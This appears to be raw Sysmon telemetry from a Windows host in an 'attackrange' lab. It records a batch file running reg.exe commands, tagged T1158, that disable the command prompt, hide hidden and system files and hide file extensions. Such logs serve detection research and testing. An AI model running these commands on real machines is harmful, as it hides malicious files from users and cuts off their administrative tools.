12:04:39.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.520{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3C01-00000000AE01}2148C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.520{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3C01-00000000AE01}2148C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.530{266CAFBE-6557-6064-3C01-00000000AE01}2148C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:04:39.520{266CAFBE-6557-6064-3B01-00000000AE01}5148C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHiddenDWORD (0x00000000) 10341000x80000000000000009411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.520{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3B01-00000000AE01}5148C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.505{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.505{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3B01-00000000AE01}5148C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.505{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3B01-00000000AE01}5148C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.518{266CAFBE-6557-6064-3B01-00000000AE01}5148C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t REG_DWORD /d "0" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:04:39.505{266CAFBE-6557-6064-3A01-00000000AE01}3476C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HiddenDWORD (0x00000000) 10341000x80000000000000009402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.505{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3A01-00000000AE01}3476C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.505{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.505{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.505{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3A01-00000000AE01}3476C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.505{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3A01-00000000AE01}3476C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.508{266CAFBE-6557-6064-3A01-00000000AE01}3476C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d "0" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:04:39.489{266CAFBE-6557-6064-3901-00000000AE01}3144C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExtDWORD (0x00000001) 10341000x80000000000000009393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.489{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3901-00000000AE01}3144C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.489{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.489{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.489{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.489{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 